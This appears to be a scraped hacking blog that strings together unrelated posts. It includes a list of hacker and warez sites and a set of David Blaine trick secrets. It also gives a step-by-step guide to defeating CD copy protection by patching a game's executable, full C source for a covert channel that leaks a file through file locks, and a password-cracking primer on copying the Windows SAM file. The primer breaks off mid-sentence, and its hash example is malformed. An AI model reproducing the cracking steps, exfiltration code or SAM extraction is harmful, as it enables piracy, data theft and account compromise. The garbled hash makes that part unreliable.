Tester 'll Never " Satisfied "

Hackers favourite websites


This thread needs ur contribution
please add in the cool sites which u know

lemme start
http://www.smokeronline.de/
-- http://g_b_m_x.tripod.com/
-- http://www.2600.com/
-- http://xisp.org/xfactor.html
-- http://www.xisp.org/downloads.html
-- http://www.assasin-germany.de/
-- http://www.megasecurity.org/Binders.html
-- http://biw.rult.at/
-- http://www.hoobie.net/brutus/
-- http://msgs.securepoint.com/bugtraq/
-- http://www.c0rtex.de/links.php
-- http://hem.passagen.se/btener/?noframe
-- http://www.computec.ch/download.php#cat3
-- http://www.mut.ac.th/~b1121625/crack.html
-- http://www.blackhat.be/
-- http://www.blackhat.be/cst/
-- http://www.phreak.org/html/main.shtml
-- http://www.diquip.gq.nu/flooders.html
-- http://askmatador.com/ep/crews.htm
-- http://www.hirosh.tk/
-- http://www.euyulio.org/
-- http://www.fategate.de/Start.html
-- http://www.networkpunk.com/?q=files&PHPSESSID=e0dc51a110811679c2b540291bd35089
-- http://www.snapfiles.com/freeware/freeware.html
-- http://lists.netsys.com/mailman/listinfo/full-disclosure
-- http://www.glocksoft.com/index.htm
http://www.mess.be/ / / mess up wid msn messenger
www.hackthissite.org
http://www.filehippo.com/ // all file downloads
http://www.subnetmask.info/ // network checking site
http://pickit.uni.cc/windows_1_0_3.php // windows First release ever installation video
www.Zamzar.com // convert file formats FREE

This summary is not available. Please click here to view the post.

David Blaine Magic Hacks

I dont believe m uploading this here
anyways this ripps the secrets behind the magical magician
have a look, check the attachments below


However i personally salute this great artist in true spirit.

David Blaine's Secrets Revealed

1. Voodoo Ash

Effect: A name is written on a piece of paper on a notepad by the spectator, the paper is torn off unseen by the magician, crumpled up and placed in an ashtray. It is then set alight.

The ashes are then rubbed on the magicians arm and the name of the person written on the paper mysteriously appears.

Preparation: You will need a small notepad, pen, ashtray, lighter and a small piece of soap or wax.
Method: The spectator is asked to write the name of a person or favourite anything of theirs on a notepad.

Then to tear of the sheet of notepaper, crumple it up and place it in the ashtray, where the magician then sets the paper alight.

The magician takes the notepad of the spectator and should be able to see the imprint of the name written on the paper above in the next sheet of the notepad.

Looking at the pad should not be made obvious and some misdirection carried out while he carefully takes the small piece of wax or soap and writes the name on the imprint on his arm or hand (this action should not be visible to anyone ).

The magician can then take some ash from the ashtray and rub it over the wax where it will stick and create an impression of the spectators word to their amazement.
This is a great trick but depends on the magician creating an atmosphere with an entertaining routine and patter about black magic to enhance the effect and create misdirection to allow him time to pull off the trick.



2. M&Ms Torn and Restored Magic Trick

Trick Effect And Routine: Tear a corner from a bag of M&Ms. Pour a few M&Ms into your hand. Then reseal the bag by magically melting the corner back onto the bag.

Magic Trick Preparation: Place a few M&Ms into your" thumb tip"( This is a useful gimmick which can be purchased cheaply from most good magic shops) .You will also need to cut a corner off a different bag of M&Ms.You can place this in your thumb tip or just conceal it behind the bag. This trick is easier to perform if you sharply crease the corner on the bag that you are supposed to rip.

Method: After you show the bag of M&Ms, discreetly slip the plastic thumb tip off your thumb and conceal it behind the bag in your hand (opening facing the corner to be ripped). Remove the extra corner from the thumb tip. Fold the creased corner towards you as you act out the magical illusion of tearing the corner. Pour out the M&Ms from the thumb tip. Secretly replace the extra corner inside the thumb tip as you unfold the creased corner. Use a rubbing motion with your forefinger and thumb to give the impression that you are melting the corner back on the bag.

Slip the thumb tip back on your thumb and your done. Hand out the bag for examination! The patter is up to you, but you can tell a story of a candy crook who never gets caught or use your imagination to come up with some other interesting story with a sweet ending.



3. Coffee To Coins David Blaine Style Trick

Set up: Get one of those coffee machine dispensed cups made of waxed paper and preferably with a pattern on the outside. Remove the bottom of the cup about an inch up from the bottom with a modelling knife or scissors and then place the cup back together by gently sliding the top half of the cup into the base using a slight twisting action if needed. Stack the cup three quarters full with coins.

Pack the coins in tightly and then pour in a little cold coffee, enough to cover the coins completely.

Coffee works best because it's so dark and will hide the coins. The cup should now look like a normal cup of coffee and is now ready to present to an audience.

Performance: Comment on how the patterns on the side of the cup are magic symbols.

Holding the top half of the cup with one hand, gently push up the bottom half of the cup with a slight screwing action with your other hand, then shake the cup.

As the coins “unsettle” the coffee will spill between the cracks and the coins appear.

This trick can be done with any cup of the waxed paper type that are usually found in vending machines. Be careful not to use hot coffee. Take care when using the modelling knife as it is sharp, even better, if your a kid, get an adult to cut it for you.



4. Cigarette Through Coin Magic Trick

David Blaine again used this impressive money trick where he pushed a cigarette through a quarter.

This trick uses a very clever gimmicked coin where the middle of the coin, temporarily opens to let the cigarette through and later closes so that the hole is virtually invisible to the spectator.

This coin is available through good magic suppliers and is a great addition to any magicians collection.



5. Coin Vanish

David Blaine was seen in his TV special to visibly vanish a coin that was on a spectators outstreched palm, without touching the spectators palm and by waving his hands above the spectators palm.

This looks very impressive and is performed by using a gimmick called The Raven which is one of the most useful and worthwhile purchases for anyone interested in Street Magic.



6. Fruit Loops Pop Up Card Trick

Performance:

Incorporated into David Blaine's "Ambitious Card" routine. A signed card is placed into the centre of the deck - with a snap of the fingers the card returns to the top.

The card is again placed into the centre of the deck, another snap of the fingers and once more the card returns to the top.

The magician now takes the end of the face-up signed card and proceeds to bend it almost double, he turns the bent card face down, cuts off the bottom half of the deck and holds the deck at eye level where the bent card can be clearly seen on top. Still holding the cards at eye level the magician places the cut portion on top of the bent card, sandwiching it at the centre.

The magician holds his right hand above the cards, a snap of the fingers and the bent card passes up through the deck and pops up on the top, it is displayed and seen to be the signed card !

Method:

Fan the deck face-up and have your volunteer select a card by touching it.

As you close the fan, cut the deck one card below the chosen card and take that portion to the top of the pack. Pack is still face up at this point.

Turn the deck over and Double Lift the top two cards displaying the chosen card. Have the chosen card signed on the face. Now return the "double lifted" card(s) face down on top of the pack.

Openly lift off the top card and have the volunteer cut off half of the deck - place the spectators chosen card (really the double lifted card) onto the bottom portion of the deck and ask the volunteer to place his half of the cut deck on top.

Ask the volunteer to snap his fingers - turnover the top card to show that the signed card has returned to the top !

Place the signed card to one side.

You now have two problems.

One: You must lose the card in the centre again.

Two: At the same time you must control the chosen card to a position second from the top (in order to perform the Pop Up Card effect).

Both problems can be solved with one move.....

Hold the deck in the dealing position with a little finger break under the top card. The deck is then held (left hand) with the deck almost at right angles to the floor, in this position use the left thumb to split the deck halfway saying "That looks like about halfway doesn't it" ? The break held by the little finger should be hidden by the base of the thumb.

Pick up the signed card and bring it in from the rear, giving the appearance of returning the card at the halfway split - it is actually returned into the break held by the little finger - beneath the top card. (This move requires a lot of practice in front of a mirror.)

Once the card has been returned, the hands/cards are brought back to a level position.

Have the volunteer snap their fingers and with some flair and a riffle, double lift the signed card and place it out-jogged (face-up) on top of the deck.

Take the outer end of the face up (double lifted) signed card with your right hand and bend it almost in half, then turn the (double lifted) bent signed card face down (leaving it bent).

The right hand now cuts the deck into two (Biddle grip) and the left thumb openly slips off the top bent card onto the bottom portion of the deck as the right hand (holding the top portion)is withdrawn to the right.

The right index finger must keep pressure on the bent signed card which is on top of the half that is being held in the right hand.

Hold the left hand portion at eye level where the bent card can be clearly seen. Still holding the cards at eye level, place the right hand portion of cards on top of the bottom half, sandwiching the bent card in the centre.

The left hand thumb and index finger must now take control of the deck and hold down the bent signed card on top of the pack, ensuring that it doesn't pop up prematurely.

The magician holds his right index finger above the cards and asks the volunteer to snap his fingers, at that moment the magician releases the pressure on the top card and up it Pops !!

Turn the card over, to reveal, once again, the signed card. Click Here For Street Magic The Things You Will Need

This trick is good in its basic form but can really be hyped with some good patter and performance from you.



7. Coin Bitten And Restored Coin Trick

David Blaine performed this extremely effective trick where a coin was bitten and a piece torn off.

The coin was restored when the missing piece was seemingly spat out at it.

This trick was used using a very cleverly engineered coin which is available from good magic suppliers and is switched for the spectators coin.

You can do your own version of the trick by making your own trick coin by looking at the coin trick section of this site. Otherwise there is the professional version available which can be viewed by clicking the above link.

Crack CD Protection
Lemme share how to finish the RiPPing by cracking
the protection. This will help you w/ the most basic system of protection,
called C- dilla, that is the most usual one…

The programs we will use are 2: first, and decompiler – the files we will
work with are in ExE format, and we need a program that will HeX them (transfer
to 16 base, hexa, form) and locate the orders given in the code, then we will
find the line we need and change it to remove the protection with... – the
second program: we need a program that will *edit* the files, and fetch the
right line number we got using the first program… all those action are easly
done w/ the programs: Win32Dasm (the disassembler - decompiler program, added in
the dir [root/Win32Dasm]), and Hiew (the editing program added in the dir
[root/Hiew]). The programs are added to the tutorial, because I’m not so sure
you can find then on a stable location on the net, in the dir [root/programs].
Chapter II: The easy protection.

Okay! To save you from reading this entire tutorial for nothing you’re not going
to use I made this chapter, because there is a good chance you won’t be needing
it! Some games comes w/ protection as a files in the [/Setup] dir (or root
dir) called: [00000001.TMP], [CLCD16.DLL], [CLCD32.DLL] and most important
[CLOKSPL.EXE]... if you see any of them delete it and the protection should
disappear (Important! delete them after making a mirror of the game on your HD,
using the info in the next chapter) … if you are still getting an error message
just keep on reading.

Chapter III: Finding the right file – and the right error.
The files we are going to work w/ will be the main ExE of the game: you will
find it on the CD, in a dir called [/Setup] or [/data], but the easy way to find
it is just installing the game, and the ExE that starts the game – will be the
ExE we need! ... once you’ve got it make some room on your HD, because we are
going to copy the hole CD to it… before you do that: some games have am option,
when Installing, to Install the full game to the CD (but still needing it to
play), use it if possible, The files you need to copy are all the game files,
in some games it is the root dir of the CD, in others it is the [root/data] dir…
the worst case is when the game is inside a CAB file, then you have to use a CAB
extractor (WinZip 8 should do the job), and if it is protected a different
program that can compile CAB format (I’ll try to put it on the tutorial as
well). Once you’ve done all that – press the ExE, and if the game opens close it
and exit the CD, then press again- you will get an error window! … usually the
line goes like: “Error, please enter CD to run game” or “CD error” or “Error
reading CD-ROM” .. what ever error you get – write it down and remember it, we
are about to look for it in the ExE code, and change it!
Chapter IV: Finding the right line number.

Open the first program - Win32Dasm, by unzipping it and clicking on
[/w32dsm89.exe], now we have to load the file we know is the main ExE of the
game, so click on “Disassembler“ in the main menu, then “Open File to
Disassemble...” (Important! Make sure you got 50-100MB free on your HD) before
then pick the file from the clone game dir you made in your HD (Important! make
a backup of the ExE) … after you’ve success fully w8ed while the program
disassembled the file, you will see *a lot * of gibberish… don’t worry! You
don’t have to understand what is says (I don’t, and I’m not so sure ne1 does…
except the programs of course) … (Important! If you can’t read and the font
shows only numbers and bizarre letters, click on “Disassembler” in main menu,
then “Font…” then “select Font” then pick Arial or something in English) … now
you have to find the exact line number out of the 2 million in the file that has
the error message in it, do that by clicking the “String Data references”
button, from the buttons menu (under the main menu) – the second one from the
right (-your right)… now you get a list of all the lines in the ExE that refers
to actions, and you have narrowed the lines from 2 million – to 2 thousand… to
find the error message click the first letter it started w/ (for example, if the
message was “Error reading CD-ROM” click E) then search ‘till you find the
error line you are looking for! … once you’ve found it… it will mark the title,
pick the first line, and it should change color to green (that means the line
can be edited and is important)… to be sure you have taken the right line:

if
there is a line like:
“:0044XBCK EB08 ….. (lots of spaces) …. Jmp 0044EBD8” or:
“:0044XBCK EB08 ….. (lots of spaces) …. Call 0044EBD8” or:
“:0044XBCK EB08 ….. (lots of spaces) …. Push 0044EBD8”


you at the right line, it says the command is a function, effected by the user,
and probably the protection we are looking for (notice the words: Jmp = Jamp,
Call = Call, Push = Push)… now that we got the right line we have to find her
number! That is done by looking at the bottom of the program window and in the
line, that should look similar to this one:

“Line:*** Pg *** of *** Code Data @:0045821 @Offset 00045821h in file:***.exe“
notic the number that comes after the word „Offet“ in this line: 00045821h that
is the line number! But notice the letter „h“ at the end of it – you don’t need
it, and don’t forget to remove it from the number, now – the only thing left to
do is changing the line and removing the protection!
Chapter V: Editing the line.

After writing down the line number you can minimize Win32Dasm, because for now
we have finished using it. Open the second program: Hiew (added in the
tutorial), this is an editor that will work bad for searching the right line,
but will do if you know the line number and just wanna change it…
Open again the same game ExE you have processed in Win32Dasm. When you enter you
see a lot of gibberish, that’s the code, and you need to change it to the
decoded language… do that by pressing the F4 key and then pick the option
“Decode“ .. heh! Alot better now... now click F5 key, to search the right line,
you will see the line numbers at the left end of the screen is gray, enter the
line number you got from Win32Dasm and it will jump you to the right loction in
the file... now, this is the difficult part, not hard to do – but hard to
explain, near the line number (just at the right) you will see the command in
HeX form, it should be something like BC1BB3D2D1 that is in HeX code (base 16)
which means a number (=byte) is represented by 2 letters/number, so that the
group (BC1BB3D2D1) is made of 5 bytes: BC – 1B – B3 – D2 – D1 ... (10 numbers =
5 bytes, 8 numbers = 4 bytes and so on...), we are about to change evrey byte
from D1 or BC to 90 this is done by pressing the key F3 (activates Editing
option) and pressing, for every byte, the number 90 (90 is the noop number, that
will disable the action)... and in our case, the command will change from
BC1BB3D2D1 to 9090909090 ... once it is done click the key F10 to save the
offset, and exit.

Chapter VI: Testing.
Now that you have an ExE w/out the error line, activate it from the same clone
dir of the game you made to test it, if its working – congratulation! You have
just cracked a CD protection! … if you are getting another error message redo
the same steps you have do w/ the first error message (in chapters 3-5) to
change it as well (Important! Do it on the same ExE you have edited, and backup
this one as well) and then test it again. You might be needed to do it several
number of times, until you are getting no error message and the game runs!


Chapter VII: Quick order list.
- Start without Cd then look at the error message and write it down.
- Search the msg in Win32Dasm referance and copy nmber w/out the H at the end!.
- Open Hiew, F4 to Decode, F5 to seach the line, and change the command – 90 for
every 1 byte.
- F10 to save and then get out, don’t forget to test!

Stenoghrapied file copy using posix file locks

I wish to share one of the working examples
the article and example below is sourced from


//www.networkpenetration.com
//File Trickery - Stenoghrapied file copy using posix file locks.
//Ste Jones root@networkpenetration.com
//
//compile: gcc filetrickery.c -Wall -o filetrickery
//
//Tested on Linux Mandrake 8.0
//Tested over NFS between two mandrake 8 machines
//
//To Do
//-----
//1. spoof args
//2. remove trailing 0's by sending size at start of transfer
//3. randomize order
//4. add spoofed locks


#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define VER "0.91"

#define TIMEOUT 3 //after timeout save and close the obtained file
#define INITTIMEOUT 30 //time for client to wait for server to start
#define SLEEP 1 //used to lower CPU usage
#define VERBOSE 1//0: less info displayed, 1: loads of info displayed, 2: debug mode

static struct flock lockit, unlockit, wrlockit;
int makefile(void);
void how2use(char *progname);
void server(void);
void client(void);
int openfile(void);
int filesize(void);
void displaybits(char );
struct fname{
char *files;
};

struct files {
char *sync1;
char *sync2;
struct fname fn[32];
};

char *sfile;
char *cfile;

struct files f[1]; //ugh why does 0 not work?
int main(int argc, char *argv[])
{
int c;

sfile = NULL;
cfile = NULL;

lockit.l_type = F_RDLCK;
lockit.l_whence = SEEK_SET;
lockit.l_start = 0;
lockit.l_len = 0;

unlockit.l_type = F_UNLCK;
unlockit.l_whence = SEEK_SET;
unlockit.l_start = 0;
unlockit.l_len = 0;

wrlockit.l_type = F_WRLCK;
wrlockit.l_whence = SEEK_SET;
wrlockit.l_start = 0;
wrlockit.l_len = 0;

printf("\nFile Trickery " VER " from www.networkpenetration.com\n");
printf("--------------------------------------------------\n");
opterr = 0;

while ((c = getopt(argc, argv, "c:s:")) != -1){
switch(c){
case 'c': cfile = optarg;
break;

case 's': sfile = optarg;
break;

default: how2use(argv[0]);
break;
}
}
if (sfile && cfile) {
printf("Select either (c)lient or (s)erver from the command line\n");
exit(1);
}

if(argc != 37){
how2use(argv[0]);
exit(1);
}

f->sync1 = argv[3];
f->sync2 = argv[4];
c = 0;
for(c=0; c<32; c++){
f->fn[c].files = argv[c+5];
}
if (cfile) {
printf("starting client\n");
client();
exit(1);
}

if (sfile) {
printf("starting server\n");
server();
exit(1);
}

exit(1);
}

//(set values, flagA1, check flagB1, set values, flagA0, check flagB0)....
void server(void)
{
unsigned char buf[0];
FILE *fd;
register int bytecount, bitcount, lockcount, filecount, p,q;
int lockfd[32];
size_t count;
int syncfd1;
register int syncfd2;
struct flock test;
register int lock;
int fsize;


fsize = filesize();
printf("Leaking: %s Size: %d bytes\n", sfile, fsize);

fd = fopen(sfile, "r");
if (!fd){
printf("Doh.... %s can't be opened\n", sfile);
exit(1);
}
bytecount = 0;
memset(lockfd, '\0', sizeof(lockfd));
count = 1;
lock = 0; //alternate 0 1 for each pass to ensure sync

while (count !=0){
if(!lock) lock = 1; //lock starts on 1
else lock = 0;

filecount = 0;
lockcount = 0;

for(q=0; q<4 || count == 0; q++){
memset(buf, '\0', sizeof(buf));
count = fread(buf, 1, 1,fd);
if (count == 0) {
if(ferror(fd) !=0){
printf("File Error\n");
exit(0);
}
if(feof(fd) !=0){
count = 0;
break;
}
}

for(bitcount=1; bitcount<=128; bitcount=bitcount*2){
if (bitcount &buf[0]){
if(VERBOSE) printf("byte %d bit:%d 1 ",bytecount,bitcount);
if((lockfd[lockcount] = open(f->fn[filecount].files, O_WRONLY)) == -1) {
printf("\nDoh.... %s can't be opened as %s\n", f->fn[filecount].files, strerror(errno));
exit(1);
}

if(fcntl(lockfd[lockcount], F_SETLK, &wrlockit) == -1){
printf("\nDoh.... Lock can't be set on %s as %s\n", f->fn[filecount].files, strerror(errno));
exit(1);
}
else {
if(VERBOSE) printf("locked file %s\n", f->fn[filecount].files);
}
lockcount++;
}
else {
if(VERBOSE) printf("byte %d bit:%d 0\n",bytecount,bitcount);
}
filecount++;
}
bytecount++;
}


if(lock) {
if((syncfd1 = open(f->sync1, O_WRONLY)) == -1) {
printf("\nDoh.... %s can't be opened as %s\n", f->sync1, strerror(errno));
exit(1);
}
if(fcntl(syncfd1, F_SETLK, &wrlockit) == -1){
printf("\nDoh.... Lock can't be set on %s as %s\n", f->sync1, strerror(errno));
exit(1);
}

else {
printf("locked %s.... waiting for client to read\n", f->sync1);
goto checkit;
}
}

if(!lock){
if(fcntl(syncfd1, F_SETLK, &unlockit) == -1){
printf("\nDoh.... Cant unlock %s as %s\n", f->sync1, strerror(errno));
exit(1);
}
else {
printf("unlocked %s.... waiting for client to read\n", f->sync1);
if(close(syncfd1) == -1){
printf("Doh.... close error on %s as %s\n", f->sync1, strerror(errno));
exit(1);
}
goto checkit;
}
}

checkit:
if((syncfd2 = open(f->sync2, O_RDONLY)) == -1) {
printf("\nDoh.... %s can't be opened as %s\n", f->sync2, strerror(errno));
exit(1);
}

test.l_type = F_RDLCK;
test.l_whence = SEEK_SET;
test.l_start = 0;
test.l_len = 0;

if(lock){
if(fcntl(syncfd2, F_GETLK, &test) == -1){
printf("Doh.... Failed getting FLOCK info for %s as %s\n", f->sync2, strerror(errno));
exit(1);
}

if(test.l_type == F_UNLCK){
//not locked
if(close(syncfd2) == -1){
printf("Doh.... close error on %s as %s\n",f->sync2, strerror(errno));
exit(1);
}
if(SLEEP) sleep(SLEEP);
goto checkit;
}

else {
//locked
if(VERBOSE) printf("%s is locked.... setting file locks\n",f->sync2);
if(VERBOSE == 2) printf("pid of owner: %d\n", test.l_pid);
if(close(syncfd2) == -1){
printf("Doh.... close error on %s as %s\n",f->sync2, strerror(errno));
exit(1);
}

goto next;
}
}// end of lock

if(!lock){
if(fcntl(syncfd2, F_GETLK, &test) == -1){
printf("Doh.... Failed getting FLOCK info for %s as %s\n", f->sync2, strerror(errno));
exit(1);
}

if(test.l_type == F_UNLCK){
printf("%s is not locked.... setting file locks\n", f->sync2);//continue
if(close(syncfd2) == -1){
printf("Doh.... close error on %s as %s\n", f->sync2, strerror(errno));
exit(1);
}
goto next;
}
else {
if(close(syncfd2) == -1){
printf("Doh.... close error on %s as %s\n",f->sync2, strerror(errno));
exit(1);
}
if(SLEEP) sleep(SLEEP);
goto checkit;
//wait
}
}

next:
for(p=0; pif(fcntl(lockfd[p], F_UNLCK, &unlockit) == -1){
printf("Doh.... Can't unlock fd: %d as %s\n", p, strerror(errno));
exit(1);
}
else {
if(close(lockfd[p]) == -1){
printf("close error on lockfd[%d] as %s\n",p, strerror(errno));
exit(1);
}
}
}
if(VERBOSE == 2)printf("Unlocked all %d fd's\n", lockcount);
if(count == 0) {
break;
}
}


printf("Finished sending file\n");
if(fclose(fd) !=0 ){
printf("Fclose error on leaked file as %s\n", strerror(errno));
exit(1);
}
//send end of file
exit(1);
}


//(check flagA1, read val, set flagB1, check flagA0, read val, flagB0).... check flagA1, read val, set flagB1
void client(void)
{
FILE *fdout;
int syncfd2, syncfd1, flag, init;
//unsigned long filesize;
struct flock test;
register int lock, bytecount, byte, a, timea, timeb, fd, i, bit;
size_t count;
char fillme[4];


init = 0;
printf("Obtaining: %s\n", cfile);
if((fdout = fopen(cfile, "w")) == NULL){
printf("Doh.... %s can't be created as %s\n", cfile, strerror(errno));
exit(1);
}
printf("Waiting for server to start....\n");
bytecount = 0;
lock = 1;
timea = time(0);
goto check;

check:

test.l_type = F_RDLCK;
test.l_whence = SEEK_SET;
test.l_start = 0;
test.l_len = 0;
timeb = time(0);

if(SLEEP) sleep(SLEEP);
if(flag){
if(timeb > (timea + TIMEOUT)){
//close locks
printf("Time exceeded.... closed and saved %s\n", cfile);
fflush(fdout);
fclose(fdout);
//run remove 0's
exit(1);
}
}

if(!flag){
if(timeb > (timea+ INITTIMEOUT)){
printf("Doh.... Server start-up timed out\n");
fclose(fdout);
exit(1);
}
}

if(lock){
if((syncfd1 = open(f->sync1, O_RDONLY)) == -1) {
printf("\nO_WRONLY.... %s can't be opened as %s\n", f->sync1, strerror(errno));
exit(1);
}

if(fcntl(syncfd1, F_GETLK, &test) == -1){
printf("Doh.... Failed getting FLOCK info for %s as %s\n", f->sync1, strerror(errno));
exit(1);
}

if(test.l_type == F_UNLCK){
//not locked
if(close(syncfd1) == -1){
printf("Doh.... close error on %s as %s\n", f->sync1, strerror(errno));
exit(1);
}
goto check;
}

else {
//locked
printf("%s locked.... reading file locks\n", f->sync1);
if(VERBOSE == 2) printf("pid of owner: %d\n", test.l_pid);
if(close(syncfd1) == -1){
printf("Doh.... close error on %s as %s\n", f->sync1, strerror(errno));
exit(1);
}
goto read;
}
}
if(!lock){
if((syncfd1 = open(f->sync1, O_RDONLY)) == -1) {
printf("\nO_WRONLY.... %s can't be opened as %s\n", f->sync1, strerror(errno));
exit(1);
}

if(fcntl(syncfd1, F_GETLK, &test) == -1){
printf("Doh.... Failed getting FLOCK info for %s as %s\n", f->sync1, strerror(errno));
exit(1);
}
if(test.l_type == F_UNLCK){
//not locked
printf("%s not locked.... reading file locks\n",f->sync1);
if(close(syncfd1) == -1){
printf("Doh.... close error on %s as %s\n", f->sync1, strerror(errno));
exit(1);
}
goto read;
}
else {
//locked
if(close(syncfd1) == -1){
printf("Doh.... close error on %s as %s\n", f->sync1, strerror(errno));
exit(1);
}
goto check;
}
}

read:
bzero(fillme, sizeof(fillme));
flag = 1;
bit = 1;
byte = 0;
a = -1;
init++;
for(i=0; i<32; i++){
a++;
if(i == 0) {
byte = 0;
}
if(a > 7){
a = 0;
}

test.l_type = F_WRLCK;
test.l_whence = SEEK_SET;
test.l_start = 0;
test.l_len = 0;
if(VERBOSE) printf("byte %d bit %d = ", bytecount + byte, bit);

if((fd = open(f->fn[i].files, O_RDONLY)) == -1) {
printf("\nO_WRONLY Doh.... %s can't be opened\n", f->fn[i].files);
exit(1);
}

if(fcntl(fd, F_GETLK, &test) == -1){
printf("Doh.... Failed getting FLOCK info for %s as %s\n", f->fn[i].files, strerror(errno));
exit(1);
}

if(test.l_type == F_UNLCK){
//not locked
fillme[byte] |= (0 << a);
if(VERBOSE) printf("0\n");
if(close(fd) == -1){
printf("Doh.... close error on %s as %s\n", f->fn[i].files, strerror(errno));
exit(1);
}
}

else {
//locked
fillme[byte] |= (1 << a);
if(VERBOSE) printf("1\n");
if(close(fd) == -1){
printf("Doh.... close error on %s as %s\n", f->fn[i].files, strerror(errno));
exit(1);
}
}

bit = bit*2;
if(bit > 128){
bit = 1;
byte++;
}
}

bytecount = bytecount + 4;

if(VERBOSE == 2) displaybits(fillme[0]);
if(VERBOSE == 2) displaybits(fillme[1]);
if(VERBOSE == 2) displaybits(fillme[2]);
if(VERBOSE == 2) displaybits(fillme[3]);
count = fwrite(fillme, 4, 1, fdout);
if(count != 1){
printf("fwrite error\n");
exit(1);
}

goto lock;

lock:

if(lock){
//lock sync2
if((syncfd2 = open(f->sync2, O_WRONLY)) == -1) {
printf("\nDoh.... %s can't be opened as %s\n", f->sync2, strerror(errno));
exit(1);
}
if(fcntl(syncfd2, F_SETLK, &wrlockit) == -1){
printf("\nDoh.... Lock can't be set on %s as %s\n", f->sync2, strerror(errno));
exit(1);
}

else {
printf("locked %s....\n",f->sync2);
timea = time(0);
lock = 0;
goto check;
}
}
if(!lock){
if(fcntl(syncfd2, F_SETLK, &unlockit) == -1){
printf("\nDoh.... Can;t unlock %s as %s\n", f->sync2, strerror(errno));
exit(1);
}
else {
printf("unlocked %s....\n", f->sync2);
if(close(syncfd2) == -1){
printf("Doh.... close error on %s as %s\n", f->sync2, strerror(errno));
exit(1);
}
timea = time(0);
lock = 1;
goto check;
}
}
}

int makefile(void)
{
int filefd;
char prefix[8];

strncpy(prefix, "XXXXXXX", sizeof(prefix));
filefd = mkstemp(prefix);
if(filefd == -1){
if(errno == EINVAL) {
printf("Doh.... template broke\n");
return(-1);
}
if(errno == EEXIST) {
printf("Doh.... couldn't create unique temp file\n");
return(-1);
}
}
printf("%s created\n", prefix);
printf("FD = %d\n", filefd);
return(filefd);
}

void displaybits(char printme)
{
unsigned c, displayMask = 1 << 7;
printf("%c = ", printme);
for (c = 1; c <=8; c++){
putchar(printme & displayMask ? '1' : '0');
printme <<= 1;
}
putchar('\n');
}


int filesize(void)
{
FILE *fd;
int size, count;
char buf[0];
size = 0;
fd = fopen(sfile, "r");
if (!fd){
printf("Doh.... %s can't be opened\n", sfile);
exit(1);
}
for(;;){
count = fread(buf, 1, 1, fd);
if (count == 0) {
if(ferror(fd) !=0){
printf("File Error\n");
exit(0);
}
if(feof(fd) !=0){
goto end;
}
}
size++;
}
end:
if(fclose(fd) !=0 ){
printf("Fclose error on leaked file as %s\n", strerror(errno));
exit(1);
}
return(size);
}

void how2use(char *progname)
{
printf( "\nThe first two files are the sync files, the first one\n"\
"used be the server and the second by the client. The rights\n"\
"for all the files should be the server has read write access\n"\
"and the client read access. The second file however should\n"\
"have the opposite rights, the client should have read write\n"\
"access and the server have read access\n\n"\
"-s Act as server\n"\
"-c Act as client\n"\
"\n"\
"Usage:\n"\
" %s -s sendme.txt .... 34 files required\n"\
" %s -c gotit.txt .... 34 files same order as server\n", progname, progname);

exit(1);
}

Password-Cracking Techniques
Understanding Password-Cracking
Techniques

We get daily tons of requests regarding password cracking,
hereby we present a well researched comprehensive article adressing the same
It may bounce many of ur heads but we are sure a must mug up for Geeks nour regular visitors!!
so Gear Up! Dont give up before having a look on the entire article!




Many hacking attempts start with attempting to crack passwords. Passwords are the key piece
of information needed to access a system. Users, when creating passwords, often select passwords
that are prone to being cracked. Many reuse passwords or choose one that’s simple—such
as a pet’s name—to help them remember it. Because of this human factor, most password cracking
is successful; it can be the launching point for escalating privileges, executing applications,
hiding files, and covering tracks. Passwords may be cracked manually or with automated tools
such as a dictionary or brute-force method, each of which are covered later in this chapter.
Manual password cracking involves attempting to log on with different passwords. The
hacker follows these steps:
1.
Find a valid user account (such as Administrator or Guest).
2.
Create a list of possible passwords.
3.
Rank the passwords from high to low probability.
4.
Key in each password.
5.
Try again until a successful password is found.
A hacker can also create a script file that tries each password in a list. This is still considered
manual cracking, but it’s time consuming and not usually effective.

Boring!! isnt it!! A more efficient way of cracking a password is to gain access to the password file on a system.
Most systems



hash
(one-way encrypt) a password for storage on a system. During the
logon process, the password entered by the user is hashed using the same algorithm and then
compared to the hashed passwords stored in the file. A hacker can attempt to gain access to
the hashing algorithm stored on the server instead of trying to guess or otherwise identify the
password. If the hacker is successful, they can decrypt the passwords stored on the server.
Passwords are stored in the Security Accounts Manager (SAM) file on a
Windows system and in a password shadow file on a Linux system.



Understanding the LanManager Hash
Windows 2000 uses NT Lan Manager (NTLM) hashing to secure passwords in transit on the
network. Depending on the password, NTLM hashing can be weak and easy to break. For
example, let’s say that the password is
123456abcdef
. When this password is encrypted with
the NTLM algorithm, it’s first converted to all uppercase:
123456ABCDEF
. The password is
padded with null (blank) characters to make it 14 characters long:
123456ABCDEF__
. Before
the password is encrypted, the 14-character string is split in half:
123456A and BCDEF__.
Each string is individually encrypted, and the results are concatenated:
123456A = 6BF11E04AFAB197F
BCDEF__ = F1E9FFDCC75575B15
The hash is
6BF11E04AFAB197FF1E9FFDCC75575B15


Hacking Tools
Legion automates the password guessing in NetBIOS sessions. Legion scans multiple
IP address ranges for Windows shares and also offers a manual dictionary attack tool.
NTInfoScan is a security scanner for NT 4.0. This vulnerability scanner produces an HTMLbased
report of security issues found on the target system and other information.
L0phtCrack is a password auditing and recovery package distributed by @stake software,
which is now owned by Symantec. It performs Server Message Block (SMB) packet captures
on the local network segment and captures individual login sessions. L0phtCrack contains
dictionary, brute-force, and hybrid attack capabilities.
John the Ripper is a command-line tool designed to crack both Unix and NT passwords. The
cracked passwords are case insensitive and may not represent the real mixed-case password.
KerbCrack consists of two programs: kerbsniff and kerbcrack. The sniffer listens on the network
and captures Windows 2000/XP Kerberos logins. The cracker can be used to find the
passwords from the capture file using a brute force attack or a dictionary attack.

Cracking Windows 2000 Passwords
The SAM file in Windows contains the usernames and hashed passwords. It’s located in the
Windows\system32\config
directory. The file is locked when the operating system is running
so a hacker can’t attempt to copy the file while the machine is booted to Windows.
One option for copying the SAM file is to boot to an alternate operating system such as
DOS or Linux with a boot CD. Alternately, the file can be copied from the
repair
directory.
If a systems administrator uses the RDISK feature of Windows to back up the system, then a
compressed copy of the SAM file called
SAM._
is created in
C:\windows\repair
. To expand
this file, use the following command at the command prompt:
C:\>expand sam._ sam
After the file is uncompressed, a dictionary, hybrid, or brute-force attack can be run against
the SAM file using a tool like L0phtCrack.


Redirecting the SMB Logon to the Attacker
Another way to discover passwords on a network is to redirect the Server Message Block
(SMB) logon to an attacker’s computer so that the passwords are sent to the hacker. In order
